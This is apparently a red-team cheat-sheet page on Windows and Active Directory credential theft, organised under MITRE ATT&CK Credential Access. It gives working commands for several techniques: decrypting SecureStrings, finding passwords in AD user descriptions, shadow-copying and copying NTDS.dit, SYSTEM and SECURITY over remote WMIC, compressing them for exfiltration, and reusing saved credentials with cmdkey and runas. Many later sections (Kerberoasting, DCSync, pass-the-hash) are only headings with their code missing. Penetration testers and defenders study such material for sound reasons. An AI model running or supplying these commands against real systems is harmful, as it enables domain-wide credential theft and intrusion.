Credential Access

The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/

SecureString to Plaintext

$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString; 
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password;

Passwords in Description

ActiveDirectory Module

Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,Description

Using PowerView.ps1 GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Find-UserField -SearchField Description -SearchTerm "password"

Volume Shadow Creation

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \\[shadow_copy_dir]\\Windows\\NTDS\\NTDS.dit [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SYSTEM [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SECURITY [target_folder]"

# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\\\[AD_IP_address]\\c$\\[target_folder]

Stored Credential Enumeration

You can use cmdkey command or the keymgr.dll (requires GUI) to list out stored credentials. Additionally, you can use the output in a runas command to authenticate.

Listing saved credentials:

cmdkey /list

Listing saved credentials in a desktop environment:

rundll32.exe keymgr.dll, KRShowKeyMgr

Using saved credentials:

runas /savecred /user:jmith cmd.exe

Dumping LSASS with rundll32.exe

Same behavior that would occur if you Right-Clicked the process in Task Manager and dump LSASS manually.

Memory Dump with Get-StorageDiagnosticInfo

Source: https://x.com/0gtweet/status/1440255495797764108 https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2019-ps

Mount VHD, pull SAM

Targeted Kerberoasting with PowerSploit

Dumping NTDS with ntdsutil.exe

DSInternals

DSInternals found here: https://github.com/MichaelGrafnetter/DSInternals

DCSync with Get-ADReplAccount

Credit to @Mastadon.

Extracting from NTDS, SYSTEM, SECURITY

You may have to modify the following registry key:

  • HKLM\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy and set "Enabled" to 0

Extracting NTDS with ntdsutil.exe

Impacket

GetUserSPNs.py

Kerberoasting

GetNPUsers.py

AS-REP Roasting - Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:

secretsdump.py

Using secretsdump to steal credentials.

Extracting Credentials Remotely

Offline NTDS Cracking

Resetting Credentials with smbpasswd.py

Reset a password if you have the credentials but it is expired. Useful if you have a hash and no pw, too.

NetExec

GitHub repo: https://github.com/Pennyw0rth/NetExec

Pass-the-Hash

Because hashes are just as good:

SMB Password Spraying

Switch out usernames/passwords/targets with lists:

Dumping Remote PowerShell History

Extracting Credentials

Relaying to DCSync

PreviousCommand and ControlNextDefense Evasion

Last updated